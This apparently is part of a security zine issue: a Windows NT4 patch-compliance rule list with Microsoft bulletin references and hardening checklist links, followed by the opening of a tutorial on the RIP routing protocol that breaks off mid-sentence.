MS00-006 C Description=Q252463-MS00-006 Malformed Hit-Highlighting Argument Patch=http://www.microsoft.com/TechNet/security/bulletin/ms00-006.asp q252463i.exe -n -q -z File=%SystemRoot%\system32\webhits.dll Version=5.0.1781.3 NT4 MS00-007 Description=MS00-007: Recycle Bin Creation Info=http://www.microsoft.com/technet/security/bulletin/ms00-007.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=22155 Q248399i.EXE -n -q -z File=%SystemRoot%\system32\shell32.dll Version=4.0.1381.7037 NT4 MS00-008 A Description=MS00-008: Registry Permissions Key=HKLM\System\CurrentControlSet\Control\SecurePipeServers\winreg Perm=Administrators:(Full)*1,Backup Operators:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 B Description=MS00-008: Registry Permissions HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths Perm=Administrators:(Full)*1,Backup Operators:(Read)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 Value Type: REG MULTI_SZ - Multi string Default Data: System\\CurrentControlSet\\Control\\ProductOptions System\\CurrentControlSet\\Control\\Print\\Printers System\\CurrentControlSet\\Services\\Eventlog Software\\Microsoft\\Windows NT\\CurrentVersion System\\CurrentControlSet\\Services\\Replicator NT4 MS00-008 C Description=MS00-008: Registry Permissions Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 D Description=MS00-008: Registry Permissions Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\AdvancedDa taFactory Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 E Description=MS00-008: Registry Permissions Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 Key=HKLM\System\CurrentControlSet\Services\w3svc\parameters\ADCLaunch\RDSServer. DataFactory NT4 MS00-008 F Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 G Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 H Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 I Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP.Hand ler Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 J Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VB.H andler Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 K Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VC.H andler Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 L Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-008 M Description=MS00-008: Registry Permissions Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug Perm=Administrators:(Full)*1,CREATOR OWNER:(Full)*1,Authenticated Users:(Read)*1,SYSTEM:(Full)*1 Info=http://www.microsoft.com/technet/security/bulletin/ms00-008.asp Patch=http://www.microsoft.com/downloads/release.asp?ReleaseID=20330 NT4 MS00-021 Description=MS00-021: Malformed TCP/IP Print Request Info=http://www.microsoft.com/technet/security/bulletin/ms00-021.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20015 Q257870i.EXE -n -q -z Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q257870 Name=Installed Value=1 Warn=More test to be done to find the correct version and location of the file lpdsvc.dll. This file is installed when you install normaly the hotfix Q257870i.EXE NT4 MS00-024 Description=MS00-024: OffloadModExpo Registry Permissions Info=http://www.microsoft.com/technet/security/bulletin/ms00-024.asp Patch=http://download.microsoft.com/download/winntsp/Patch/Q259496/NT4/EN-US/Q25 9496i.exe File=%SystemRoot%\system32\regacl40.exe Version=4.0.1381.7064 NT4 MS00-027 Description=MS00-027: Malformed Environment Variable Info=http://www.microsoft.com/technet/security/bulletin/ms00-027.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20494 Q259622i.EXE -n -q -z File=%SystemRoot%\system32\CMD.EXE Version=4.0.1381.7048 NT4 MS00-029 Description=MS00-029: IP Fragment Reassembly Info=http://www.microsoft.com/technet/security/bulletin/ms00-029.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829 Q259728i.EXE -n -q -z File=%SystemRoot%\system32\drivers\tcpip.sys Version=4.0.1381.7050 NT4 MS00-036 Description=MS00-036: ResetBrowser Frame Info=http://www.microsoft.com/technet/security/bulletin/ms00-036.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=21397 Q262694i.EXE -n -q -z File=%SystemRoot%\system32\drivers\rdr.sys Version=4.0.1381.7055 NT4 MS00-040 A Description=MS00-040: Remote Registry Access Authentication Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q26 4684i.EXE Q264684i.EXE -n -q -z File=%SystemRoot%\system32\rpcrt4.dll Version=4.0.1381.7058 NT4 MS00-040 B Description=MS00-040: Remote Registry Access Authentication Info=http://www.microsoft.com/technet/security/bulletin/ms00-040.asp Patch=http://download.microsoft.com/download/winntsp/Patch/Q264684/NT4/EN-US/Q26 4684i.EXE Q264684i.EXE -n -q -z File=%SystemRoot%\system32\WINLOGON.EXE Version=4.0.1381.7058 NT4 MS00-047 Description=MS00-047: NetBIOS Name Server Protocol Spoofing Info=http://www.microsoft.com/technet/security/bulletin/MS00-047.asp Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q269239/download. asp File=%SystemRoot%\system32\drivers\netbt.sys Version=4.0.1381.7086 NT4 MS00-052 A Description=MS00-052: Relative Shell Path Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360 q269049i.exe -n -q -z File=%SystemRoot%\system32\MSGINA.DLL Version=4.0.1381.7085 NT4 MS00-052 B Description=MS00-052: Relative Shell Path Info=http://www.microsoft.com/technet/security/bulletin/MS00-052.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360 q269049i.exe -n -q -z File=%SystemRoot%\system32\USERINIT.EXE Version=4.0.1381.7085 NT4 MS00-070 A Description=MS00-070: Multiple LPC and LPC Ports Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650 q266433i.exe -n -q -z File=%SystemRoot%\system32\NTOSKRNL.EXE Version=4.0.1381.7086 NT4 MS00-070 B Description=MS00-070: Multiple LPC and LPC Ports Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650 q266433i.exe -n -q -z File=%SystemRoot%\system32\MSAUDITE.DLL Version=4.0.1381.7086 NT4 MS00-070 C Description=MS00-070: Multiple LPC and LPC Ports Info=http://www.microsoft.com/technet/security/bulletin/MS00-070.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24650 q266433i.exe -n -q -z File=%SystemRoot%\system32\SMSS.EXE Version=4.0.1381.7086 NT4 MS00-077 Description=MS00-077: NetMeeting Desktop Sharing Info=http://www.microsoft.com/technet/security/bulletin/MS00-077.asp Patch=http://download.microsoft.com/download/netmeeting/SP/3.01/W9XNT4/EN-US/NM3 0.EXE Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q266433 Name=Installed Value=1 NT4 MS00-081 Description=MS00-081 VM File Reading Info=http://www.microsoft.com/TechNet/security/bulletin/MS00-081.asp Patch=Patch=http://download.microsoft.com/download/vm/Install/3802/W9X2KMe/EN-US /msjavx86.exe JAVA All builds in the 3000 series numbered 3318 or earlier. File=%SystemRoot%\jview.exe Version=5.0.3802.0 NT4 MS00-083 Description=MS00-083: Netmon Protocol Parsing Info=http://www.microsoft.com/technet/security/bulletin/MS00-083.asp Patch=http://download.microsoft.com/download/win2000platform/Patch/Q274835/NT5/E N-US/Q274835_W2K_SP2_x86 En.EXE q274835i.exe -n -q -z Key=HKLM\Software\Microsoft\Windows NT\CurrentVersion\Hotfix\Q274835 Name=Installed Value=1 NT4 MS00-090 A Description=Q238934 Q280419 MS00-090 .ASX Buffer Overrun and .WMS Script Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp wmsu33995.exe /Q File=%SystemRoot%\system32\dxmasf.dll Version=6.4.9.1109 NT4 MS00-090 B Description=MS00-090 .ASX Buffer Overrun and .WMS Script Info=http://www.microsoft.com/technet/security/bulletin/fq00-090.asp wmsu33995.exe /Q File=%SystemRoot%\system32\advpack.dll Version=5.50.4522.1800 NT4 MS00-091 Description=MS00-091: Incomplete TCP/IP Packet Info=http://www.microsoft.com/technet/security/bulletin/ms00-091.asp Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q275567/download. asp File=%SystemRoot%\system32\drivers\netbt.sys Version=4.0.1381.7086 NT4 MS00-094 Description=MS00-094: Phone Book Service Buffer Overflow Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26193 Q276575i.EXE -n -q -z The fix will patch pbserver.dll. The file version must be checked and replaced in this rule File=%SystemRoot%\system32\pbserver.dll Version=7.1.2195.2478 NT4 MS00-095 A Description=MS00-095: Registry Permissions Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501 Q265714i.EXE -n -q -z File=%SystemRoot%\system32\TCPCFG.DLL Version=4.0.1381.7064 NT4 MS00-095 B Description=MS00-095: Registry Permissions Info=http://www.microsoft.com/technet/security/bulletin/MS00-095.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24501 Q265714i.EXE -n -q -z File=%SystemRoot%\system32\regacl40.exe Version=4.0.1381.7064 NT4 MS01-003 A Description=MS01-003 Winsock Mutex Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272 Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download. asp For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291 File=%SystemRoot%\system32\mswsock.dll Version=4.0.1381.7086 NT4 MS01-003 B Description=Q279336 MS01-003 Winsock Mutex Info=http://www.microsoft.com/technet/security/bulletin/fq01-003.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272 Patch=http://www.microsoft.com/ntserver/nts/downloads/critical/q279336/download. asp For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291 File=%SystemRoot%\system32\ws2_32.dll Version=4.0.1381.7086 NT4 MS01-008 Description=MS01-008 NTLMSSP Privilege Elevation Info=http://www.microsoft.com/technet/security/bulletin/fq01-008.asp q280119i.exe -n -q -z Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27804 For terminal Server Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27824 File=%SystemRoot%\system32\NTLMSSPS.DLL Version=4.0.1381.7086 NT4 MS01-009 Description=MS01-009 Malformed PPTP Packet Stream Info=http://www.microsoft.com/TechNet/security/bulletin/MS01-009.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27836 q283001i.exe -n -q -z File=%SystemRoot%\system32\drivers\raspptpe.sys Version=4.0.1381.7090 NT4 MS01-033 Description=MS01-033 Unchecked Buffer in Index Server ISAPI Extension Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 File=%SystemRoot%\system32\idq.dll Version=5.0.1781.3 NT4 MS01-035 A Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server extensions\40\servsupp\fp4Amsft.dll Version=4.0.2.5121 NT4 MS01-035 B Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fp4Awel.dll Version=4.0.2.5121 NT4 MS01-035 C Description=FrontPage Server Extension Unchecked Buffer Info=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31038 Patch=http://download.microsoft.com/download/winntsp/Patch/Q300477/NT4/EN-US/Q30 0477.exe File=%SYSTEMDRIVE%\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fp4Areg.dll Version=4.0.2.5121 NT4 MS99-025 Description=MS99-025 Unauthorized Access using ODBC File=%SystemDrive%\Program Files\Common Files\System\OLE DB\oledb32.dll Info=http://www.microsoft.com/TechNet/security/bulletin/ms99-025.asp Version=2.51.5303.0 NT4 MS99-041 Description=MS99-041: RASMAN Security Descriptor Info=http://www.microsoft.com/technet/security/bulletin/ms99-041.asp Patch=ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes- PostSP6/Security/Rasman-fix/ Perm=Administrators:(Full),Authenticated Users:(CQEAIUR),System:(Full) Type of check: Check permissions on a service RasMan NT4 MS99-046 A Description=MS99-046: TCP Initial Sequence Number Randomness Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 q243835i.exe -n -q -z File=%SystemRoot%\system32\drivers\tcpip.sys Version=4.0.1381.7050 NT4 MS99-046 B Description=MS99-046: TCP Initial Sequence Number Randomness Info=http://www.microsoft.com/technet/security/bulletin/ms99-046.asp Patch=http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 File=%SystemRoot%\system32\wshtcpip.dll Version=4.0.1381.336 NT4 MS99-047 A Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\spoolss.exe Version=4.0.1381.7022 NT4 MS99-047 B Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q2 43649.exe Patch=File=%SystemRoot%\system32\spoolss.dll Version=4.0.1381.7022 NT4 MS99-047 C Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\localmon.dll Version=4.0.1381.7022 NT4 MS99-047 D Description=MS99-047: Malformed Spooler Request Info=http://www.microsoft.com/technet/security/bulletin/ms99-047.asp Patch=http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN -US/Q243649.exe File=%SystemRoot%\system32\win32spl.dll Version=4.0.1381.7022 NT4 MS99-055 Description=MS99-055: Malformed Resource Enumeration Argument Info=http://www.microsoft.com/technet/security/bulletin/ms99-055.asp Patch=http://download.microsoft.com/download/winntsrv40/Update/srvsvc/NT4/EN-US/ Q246045.EXE q246045.exe -n -q -z File=%SystemRoot%\system32\srvsvc.dll Version=4.0.1381.7029 NT4 MS99-056 A Description=MS99-056: Syskey Keystream Reuse Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248 183.EXE File=%SystemRoot%\system32\lsasrv.dll Version=4.0.1381.7029 NT4 MS99-056 B Description=MS99-056: Syskey Keystream Reuse Info=http://www.microsoft.com/technet/security/bulletin/ms99-056.asp Patch=http://download.microsoft.com/download/winntsp/Patch/syskey/NT4/EN-US/Q248 183.EXE File=%SystemRoot%\system32\samsrv.dll Version=4.0.1381.7030 NT4 MS99-057 Description=MS99-057: Malformed Security Identifier Request same as MS99-056 Rule=W2K MS01-037 D Inherit all the settings of this rule MS99-057 NT4 MS-Q249863 Description=Q249863 SGC Connections May Fail from Domestic Clients Info=http://support.microsoft.com/support/kb/articles/Q249/8/63.ASP Info=http://www.microsoft.com/Windows95/downloads/contents/WUCritical/schannel/D efault.asp Patch=http://www.microsoft.com/NTWorkstation/downloads/Critical/schannel/default .asp q249863i.exe -n -q -z File=%SystemRoot%\system32\schannel.dll Version=4.87.1961.1877 NT4 W2K MS00-094 Description=MS00-094: Phone Book Service Buffer Overflow Info=http://www.microsoft.com/technet/security/bulletin/ms00-094.asp Patch=http://download.microsoft.com/download/win2000platform/Patch/Q276575/NT5/E N-US/Q276575_W2K_SP2_x86_en.EXE File=%SystemRoot%\system32\pbserver.dll Version=7.1.2195.2478 NT4 W2K MS01-022 Description=MS01-022 OLE DB Provider for Internet Publishing Info=http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security /bulletin/ms01-004.asp Patch=http://download.microsoft.com/download/win2000platform/Update/1.5/WIN98Me/ EN-US/rbupdate.exe File=This will Update many files that is why are not listed. ================================================================================ Below are the needed HOTFIXES for NT server based on MS site. ================================================================================ December 2000 MS00-095: Tool Available for "Registry Permissions" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-095.asp MS00-094: Patch Available for "Phone Book Service Buffer Overflow" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-094.asp November 2000 MS00-091: Patch Available for "Incomplete TCP/IP Packet" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-091.asp MS00-083: Patch Available for "Netmon Protocol Parsing" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-083.asp October 2000 MS00-070: Patch Available for "Multiple LPC and LPC Ports" Vulnerabilities http://www.microsoft.com/technet/security/bulletin/MS00-070.asp July 2000 MS00-052: Patch Available for "Relative Shell Path" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-052.asp MS00-047: Patch Available for "NetBIOS Name Server Protocol Spoofing" Vulnerability http://www.microsoft.com/technet/security/bulletin/MS00-047.asp June 2000 MS00-040: Patch Available for "Remote Registry Access Authentication " Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-040.asp May 2000 MS00-036: Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities http://www.microsoft.com/technet/security/bulletin/ms00-036.asp MS00-029: Patch Available for "IP Fragment Reassembly" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-029.asp April 2000 MS00-027: Patch Available for "Malformed Environment Variable" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-027.asp MS00-024: Tool Available for "OffloadModExpo Registry Permissions" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-024.asp March 2000 MS00-021: Patch Available for "Malformed TCP/IP Print Request" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-021.asp MS00-008: Patch Available for "Registry Permissions" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-008.asp February 2000 MS00-007: Patch Available for "Recycle Bin Creation" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-007.asp January 2000 MS00-005: Patch Available for "Malformed RTF Control Word" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-005.asp MS00-004: Patch Available for "RDISK Registry Enumeration File" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms00-004.asp December 1999 MS99-057: Patch Available for "Malformed Security Identifier Request" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-057.asp MS99-056: Patch Available for "Syskey Keystream Reuse" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-056.asp MS99-055: Patch Available for "Malformed Resource Enumeration Argument" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-055.asp November 1999 MS99-047: Patch Available for "Malformed Spooler Request" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-047.asp October 1999 MS99-046: Patch Available to Improve TCP Initial Sequence Number Randomness http://www.microsoft.com/technet/security/bulletin/ms99-046.asp September 1999 MS99-041: Patch Available for "RASMAN Security Descriptor" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-041.asp MS99-038: Patch Available for "Spoofed Route Pointer" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-038.asp MS99-036: Windows NT 4.0 Does Not Delete Unattended Installation File http://www.microsoft.com/technet/security/bulletin/ms99-036.asp MS99-034: Patch Available for "Fragmented IGMP Packet" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-034.asp July 1999 MS99-026: Patch Available for "Malformed Dialer Entry" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-026.asp MS99-024: Patch Available for "Unprotected IOCTLs" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-024.asp June 1999 MS99-023: Patch Available for "Malformed Image Header" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-023.asp MS99-021: Patch Available for "CSRSS Worker Thread Exhaustion" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-021.asp MS99-020: Patch Available for "Malformed LSA Request" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-020.asp May 1999 MS99-017: Patch Available for "RAS and RRAS Password" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-017.asp MS99-016: Patch Available for "Malformed Phonebook Entry" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-016.asp MS99-015: Patch Available for "Malformed Help File" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-015.asp March 1999 MS99-008: Patch Available for Windows NT "Screen Saver" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-008.asp February 1999 MS99-007: Patch Available for "Taskpads Scripting" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-007.asp MS99-006: Fix Available for Windows NT "KnownDLLs List" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms99-006.asp MS99-004: Patch Available for Authentication Processing Error in Windows NT 4.0 Service Pack 4 http://www.microsoft.com/technet/security/bulletin/ms99-004.asp November 1998 MS98-017: Patch Available for "Named Pipes Over RPC" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms98-017.asp September 1998 MS98-014: Patch Available for "RPC Spoofing Denial of Service" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms98-014.asp August 1998 MS98-012: Patch available for Security Vulnerabilities in Microsoft PPTP http://www.microsoft.com/technet/security/bulletin/ms98-012.asp July 1998 MS98-009: Patch Available for "Windows NT Privilege Elevation" Vulnerability http://www.microsoft.com/technet/security/bulletin/ms98-009.asp March 1998 MS98-001: Disabling Creation of Local Groups on a Domain by Non-Administrative Users http://www.microsoft.com/technet/security/bulletin/ms98-001.asp ================================================================================ >----------------------------------------< >---After you install NT HotFixes ? ---< >----------------------------------------< Fix Your Security ---> NT Server & Wks Windows NT 4.0 Member Server Configuration Checklist http://www.microsoft.com/technet/security/mbrsrvcl.asp This checklist outlines the steps you should take to secure Windows NT servers acting as member servers, either on their own or as part of a Windows NT or Windows 2000 domain. Windows NT 4.0 Workstation Configuration Checklist http://www.microsoft.com/technet/security/wrkstchhk.asp This checklist outlines the steps you should take to secure computers running Windows NT Workstation, either on their own or as part of a Windows NT or Windows 2000 domain. Windows Domain Controller Checklist http://www.microsoft.com/technet/security/dccklst.asp This checklist outlines the steps you should take to secure servers acting as Windows NT Server 4.0 domain controllers (DCs). Windows NT C2 Configuration Checklist http://www.microsoft.com/technet/security/c2config.asp This checklist outlines the steps you should take to duplicate the C2-evaluated configuration of Windows NT Server 4.0. Note that following this checklist does not make your installation C2-compliant; it merely assures you that the software configuration matches the configuration that the NCSC evaluated. ---> Advanced Server Secure Internet Information Services 5 Checklist http://www.microsoft.com/technet/security/iis5chk.asp Recommendations and best practices to secure a server on the Web running Microsoft Windows 2000 and Internet Information Services (IIS) 5 Windows 2000 Internet Server Security Tool http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19889 This tool makes it easy to secure an Internet server running IIS 5.0. It lets you configure an IIS 5.0 server without needing to configure individual registry settings, security policies, and other details Hotfix Checking Tool for IIS 5.0 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=24168 This tool enables IIS 5.0 administrators to to ensure that their servers are up to date on all security patches. The tool can be run continuously or periodically, against the local machine or a remote one, using either a database on the Microsoft website or a locally-hosted copy. When the tool finds a patch that hasn't been installed, it can display or dialogue or write a warning to the event log. >-------------------------< >---Fix Your Registry ---< >-------------------------< This step is going to be covered in detail in the next KV12 [Routing Information Protocol (RIP)]====================[pr00f/alkinoos] +--[ Table of Contents ]------------------------------------------+ | | [1]- Introduction .............................................. -[1] [2]- Background ................................................ -[2] [3]- RIP Operation ............................................. -[3] [4]- Microsoft Specific RIP Features ........................... -[4] [5]- RIPv1 Packet Details ...................................... -[5] [6]- RIPv2 Packet Details ...................................... -[6] [7]- RIPv2 Authentication ...................................... -[7] [8]- Thanks .................................................... -[8] | | +-----------------------------------------------------------------+ = Introductions = I decided to write on this subject for the upcoming Keen Veracity 11, a publication brought out by the Legions of the Underground (LoU). I'm not usually one to write a text or an article of any kind, as I don't have much confidence in my writing. However, KV11 was in need of submissions. I wanted to write about a subject that hasn't already been gone over a hundred times before. This was my choice. - pr00f The first time I had to deal with RIP, it was a nightmare. I had to find a way for various pieces of equipment from different manufacturers to share routing information. I hope that this will help those that might be interested in how the worlds most popular Interior Gateway Protocol (IGP) works, and maybe offer insight to those who are trying to actually work with RIP. - alkinoos = Background = Although this document was written for people without much existing knowledge of RIP, it does require a basic understanding of networking and perhaps TCP/IP. Enjoy. RIP is a distance-vector protocol that uses the hop count as its metric value and is designed for IP networks. Basically, it can determine distances between a packets' source and destination by counting the number of routers the packet should travel through (a metric is a number representing the distance to a destination, in this case its measured in routers). RIP is used for routing only within a single autonomous system (the definition of an IGP) and was originally drafted in 1988 (RFC 1058) and later upgraded in 1994 (RFC 1723). = RIP Operation = Networks have a certain topology that is sometimes static, and sometimes dynamic. RIP provides routing information for dynamically changing network topologies. It also has safety-net features that prevent improper route broadcasting, such as having the ability to detect a split horizon. The metric count that RIP stores can range anywhere from 1 to 16, so that when the hop count reaches 16 it is considered infinite, and the route is considered unreachable: this helps prevent an infinite routing loop. This also presents a shortcoming as there may be networks that have more than 15 hops (although I hope I never have to deal with one ;). Determining the shortest path by metric can also be misleading because there are other issues like latency and throughput that are not covered by RIP. RIP messages are encapsulated in UDP (User Datagram Protocol) packets and broadcast to the destination subnet on port 520. RIP manages itself via timers. The routing-update timer keeps track of how long it should wait between routing updates and is generally set somewhere between half a minute and a full minute. A few random number of seconds should be added or subtracted to/from this timer every time it is reset in order to prevent collisions with other timers. If a route is not renewed, it will remain a route until the route-timeout timer expires as an invalid route, then dropped from a routing table when the the route-flush time expires. One of the major differences between the two RIP versions is that RIPv2 has the ability to support subnetting, supernetting, and Variable Length Subnet Masks (VSLM) or Classless InterDomain Routing (CIDR). This is very important in todays networks and it is rare to see RIPv1 used. Another major difference and reason RIPv1 is not used as much is that RIPv2 supports authentication. RIPv2 also adds support for (optional) multicast RIP announcements, which are sent to the IP multicast address 224.0.0.9. This helps 